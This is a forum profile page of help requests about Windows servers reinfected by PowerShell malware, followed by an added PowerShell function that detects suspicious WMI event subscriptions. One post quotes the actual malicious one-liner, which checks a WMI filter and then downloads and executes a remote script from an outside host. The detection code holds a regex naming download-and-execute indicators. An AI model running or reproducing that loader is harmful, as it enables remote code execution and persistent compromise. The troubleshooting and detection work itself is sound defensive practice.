Alvaro

Everything posted by Alvaro

  1. Hi, thanks for your effort, but the problem continues: Malwarebytes keeps giving the message "site blocked due to a potentially malicious IP: xxx.xxx.xxx.xx". It is also very strange that if I try to go to %temp% I end up in c:\temp\1, but my temp folder is at c:\temp. If I try to delete all temp files there is always one in use, but I cannot delete the "1" folder.
  2. Hi, thanks for the response, but apparently the solution is not working. I have Malwarebytes Endpoint Security running on an SBS 2011 server, so when I try to install Malwarebytes 3.0 the installer stops because it is not for my OS. In the second step, when I run AdwCleaner it detects that my DHCP service is infected (description attached as a jpg image), and the third step is not possible because the antivirus eliminates the download once it is in the Downloads folder. When I start the Malwarebytes scanner I choose to detect PUPs and all the checks to try to locate the infection, but none is detected. I run Symantec Endpoint Security with the same result: nothing appears in detections. I think it is a script running in the background under a PowerShell service, but I have no clue how to detect and stop it.
  3. Hi, I have two Windows servers (2008 and SBS 2011) and both were infected with the Y1.bat variant. I ran some scripts and apparently removed them from the system; currently I have Malwarebytes Endpoint installed, and from time to time the anti-exploit shows a message blocking some IP address from access, but nobody uses this server as a workstation. Now apparently the malware has come back with a different variant, and when I scan with Malwarebytes no infection appears; I downloaded and scanned with the Anti-Rootkit and nothing appears either. I see that the %temp% folder is redirected to a Temp\1 folder (same as the last time); I am not sure how to properly remove this threat. Any suggestion will be appreciated. Previously I discovered the following script, which I properly removed: powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}" The following link explains how it was removed in the past: https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved
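The one-liner quoted in post 3 checks whether a permanent WMI event subscription named 'SCM Event Filter' already exists before it re-downloads the payload, which is the classic WMI persistence a scan of files alone will not surface. As an added example (not code from these posts or from Malwarebytes), the function below lists every filter-to-consumer binding in root\subscription and reports the ones whose consumer launches PowerShell or pulls code from a URL; the filter name comes from the post, while the indicator regex, the function name and the output fields are my own assumptions.

```powershell
# Added example, not from the original posts: enumerate permanent WMI event
# subscriptions in root\subscription and report suspicious ones. Get-WmiObject is
# used deliberately so this also runs on the PowerShell 2.0 shipped with SBS 2011.
# 'SCM Event Filter' is the name the quoted script tests for; the other patterns
# are assumed indicators of a consumer that runs PowerShell or downloads code.
function Get-SuspiciousWmiSubscription {
    $ns = 'root\subscription'
    $indicator = 'powershell|DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|https?://|EncodedCommand|FromBase64String'

    foreach ($binding in @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)) {
        # Filter and Consumer hold relative object paths; resolve them in the same namespace
        try {
            $filter   = [wmi]"\\.\$($ns):$($binding.Filter)"
            $consumer = [wmi]"\\.\$($ns):$($binding.Consumer)"
        } catch {
            Write-Warning "Could not resolve binding $($binding.__RELPATH): $_"
            continue
        }

        # The executable payload lives in a class-specific property
        $payload = switch ($consumer.__CLASS) {
            'CommandLineEventConsumer'  { $consumer.CommandLineTemplate }
            'ActiveScriptEventConsumer' { $consumer.ScriptText }
            default                     { '' }
        }

        $reasons = @()
        if ($filter.Name -eq 'SCM Event Filter') { $reasons += 'filter name used by the known infection' }
        if ($payload -match $indicator)          { $reasons += "consumer payload matches '$($Matches[0])'" }

        if ($reasons.Count -gt 0) {
            New-Object PSObject -Property @{
                FilterName    = $filter.Name
                FilterQuery   = $filter.Query
                ConsumerClass = $consumer.__CLASS
                ConsumerName  = $consumer.Name
                Payload       = $payload
                Reason        = ($reasons -join '; ')
            }
        }
    }
}

# Review each hit before removing anything (binding first, then consumer and filter).
Get-SuspiciousWmiSubscription | Format-List
```

A legitimate subscription (backup agents and some management tools create them) will usually have a recognisable consumer command, so confirm each hit before deleting its binding, consumer and filter with Remove-WmiObject.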